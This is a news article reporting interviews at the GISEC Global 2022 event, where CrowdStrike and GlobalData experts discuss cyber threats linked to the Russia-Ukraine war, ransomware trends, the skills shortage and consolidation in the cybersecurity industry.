- Enterprises should strengthen cybersecurity defences amid the crisis.
- Malicious activities are coming from new countries that were usually not very active on the nation-state attacks scene.
- The war serves as a stark reminder of the importance of identifying the threat model and altering risk management objectives accordingly.
The Middle East is not far from the repercussions of the Russia-Ukraine conflict and the impact has already been felt on the supply chain and has also seen a heightened risk of cyberwarfare, a cybersecurity expert said.
“Our CrowdStrike Falcon platform is noting the heightened level of security incidents that are taking place daily and an elevated number of the nation-state, state-sponsored attacks and some eCrime actors as well that traditionally operated from East European and Russian geography are also getting involved in the cyber warfare,” Roland Daccache, Systems Engineering Manager for Middle East and Africa at CrowdStrike, told TechChannel News during the GISEC Global 2022 event.
The three-day event is taking place from 21st-23rd March at Dubai World Trade Centre.
Moreover, he said that many countries are taking sides in new cyberwarfare setups.
“We see malicious activities coming from new countries that were usually not very active on the nation-state attacks. The Conti ransomware gang, splitting between the Ukrainian and Russian supporters, has exposed their operations last month,” he said.
Conti is a ransomware-as-a-service group that allows affiliates to rent access to its infrastructure to launch attacks.
Experts said that Conti is based in Russia and may have ties to Russian intelligence.
Spending more on cybersecurity
“All countries are strengthening their cybersecurity infrastructure, especially after the Russian-Ukraine conflict. All NATO countries need to spend two per cent of their GDP on defence but now we have seen that the movement has reversed,” Daccache said.
“Now, we see that these countries are spending more and for cybersecurity defence and more investment from a national level, European bloc level and American administration level for defensive and offensive levels,” he said.
Finland’s Ministry of the Interior and Ministry of Defense have initiated a project to assess the authorities’ capabilities to maintain national cybersecurity, prevent cybercrime, implement cyber defence, and respond to highly dynamic conditions that risk society’s cybersecurity.
The project will examine the authorities’ current operational circumstances in serious crises, like the Russia-Ukraine conflict that jeopardises national cybersecurity, as well as identify key development needs while Italy has warned that using Russian computer software may carry a “technological risk” following the invasion of Ukraine.
Importance of identifying the model
Manish Dixit, Principal Disruptive Tech Analyst at GlobalData, said that malicious state-sponsored cyber-activities have historically escalated when geopolitical tensions are high.
“Concerns about increased cyber activity amidst the Russia-Ukraine crisis serve as a stark reminder of the importance of identifying the threat model and altering risk management objectives accordingly.”
Pranjali Mujumdar, Disruptive Tech Analyst at GlobalData, said that destructive malware can be a direct threat to a company’s daily operations, posing risk to key assets and data.
Every company, regardless of size, he said must act quickly to secure its information technology infrastructure.
“A robust cybersecurity infrastructure will help companies to identify and thwart cyberattacks, as well as remain secure throughout the security lifecycle,” she said.
In 2021, Daccache said that number of increased targeted attacks in the Middle East was notable and that trend is likely to stay.
On a global level, he said the average demand for a ransom is about $6 million, up 36 per cent from 2020.
“Our intelligence team is detecting more than 50 targeted ransomware attacks per week and over the year; we observed more than 2,700 big game hunting incidents. On a global scale as well as on a regional scale, we see a tendency for cyberattacks to grow in scale, in number and impact,” he said.
New wave of cyberattacks
When it comes to nation-state attacks on the Middle East, Daccache said that they have seen two main trends -one is the elevated exploit of known vulnerabilities by Chinese threat actors and secondly from Russia.
“We have seen Fancybear, from Russia, shifting from on-prem to cloud assets. We have to brace ourselves for a new wave of cyberattacks that does not target just endpoints but also networks, cloud workloads, SaaS applications. Bad guys are ready to hit enterprises that have digital footprints,” he said.
Organisations have to prepare for a wave of attacks from both nation-state and eCrime actors this year, he said, and from an eCrime perspective, hackers target Saudi Arabia, UAE, Egypt and Qatar more from the Middle East.
“The more you are exposed digitally, the more you are prone to cyberattacks,” he said.
When asked whether too much digitisation globally is creating an opportunity for hackers, he said: “absolutely yes”.
The reason, he said is that the more target organisations have, the more likely they have to succeed.
VPN gateways, cloud workloads, on-prem software, supply chain software, domain controllers and exchange servers are targeted.
Digitisation poses risk
“The more digital assets we have and the more digital services we offer, the risk is bigger and we have to apply multiple layered defences around every digital solution that we adopt to maintain the same level of security when we expand our digital footprint,” Daccache said.
As the digital transformation is gaining pace, the cybersecurity solution providers and the hackers are also keeping pace, he said.
“The attacks are becoming more sophisticated. So, the cybersecurity solutions industry must become much more proactive to adapt to the fact that threat actors are also innovating like using machine learning and artificial intelligence and their form of threat intelligence and collaboration.
“We have seen the proliferation of access brokers and proliferation of tools that are at their disposal of eCrime actors. Cybersecurity needs to invest more in outlasting the threat actors. It is an everlasting cat and mouse game but we need to innovate to stop the modern threat actors,” he said.
However, he said that vendors that do not offer AI and ML capabilities will not be in the cybersecurity industry in the next couple of years.
The reason behind this, he said is that the traditional signature-based or rule-based solutions such as the AV, firewall is not really up to par with modern sophisticated attacks.
Skills gap to get worse
There is a shortage of cybersecurity skills globally and it is going to get worse, Daccache said and due to that CIOs and CISOs have to face difficult decisions around how to prioritise budget spending.
“They have to look at options where they do not have to figure everything out on their own or build every capability on their own. While building their software, if you are not a very large company, outsourcing that service to a managed detection and response service can go a long way in giving you access to top security skills without having everything on your payroll,” he said.
So, he said that CIOs and CISOs need to spend their budget on areas that are of top priorities such as securing the endpoints, securing the cloud.
“So, you have to modernise the type of technologies that you use to stop modern attacks. Adopt more cloud-native technologies and less on-prem to protect your environment,” he said.
However, he said that there is a misconception that workloads in the cloud are protected by the cloud providers but that is not the case.
“You have to apply the same level or the same mindset that you use to protect your on-prem assets. There is no escape today from adopting cloud technologies. The cybersecurity teams of the organisations need to work hand in hand with the IT teams and business process owners to make sure that they cover the right cybersecurity measures at every step of the way in becoming more digital,” he said.
Consolidation to intensify
When asked whether there is a need for consolidation in the cybersecurity industry, Daccache believes that customers are tired of siloed solutions and whenever a breach happens, only a few providers have the solutions.
“That is why consolidation has started to appear in the market,” he said.
For example, EDR and endpoint security are merging into a single product, vulnerability management and asset discovery are becoming a feature on endpoint security.
“The technology stack is becoming more condensed now and customers have to look only at fewer places. But this impacts the business of cybersecurity. So, I see the trend of bigger companies acquiring small ones is going to be a trend,” he said.
Recently, Google has signed an agreement to acquire cybersecurity company Mandiant, based in Virginia, in an all-cash transaction valued at $5.4 billion and Siemplify in January.
According to 451 Research, the first three quarters of last year saw 151 transactions, up from 94 for the same period in 2020, and the trend is likely to continue this year also.
Check Point is acquiring Israel-based Spectral, Web security and performance company Cloudflare has bought Vectrix, Forescout Technologies has acquired healthcare cybersecurity firm CyberMDX, Juniper Networks has acquired WiteSand, Nord Security and Surfshark have announced their merger.
Bad guys are becoming intelligeent
With the prevailing geopolitical tensions threatening to disrupt and undermine technology industries and spread well beyond national borders, experts said that there are concerns about cyberattacks, particularly on critical infrastructure space.
“Both Russia and Ukraine have a high level of expertise in information technology and computer hacking, thus, cyberwarfare can not only target big companies or government organisations; any small business involved in the public sector’s supply chain will also be vulnerable,” Mujumdar said.
Attackers are increasingly attempting to accomplish their objectives without writing malware to the endpoint, Daccache said and has observed that hackers are using legitimate credentials and built-in tools in a deliberate effort to evade detection by legacy antivirus products.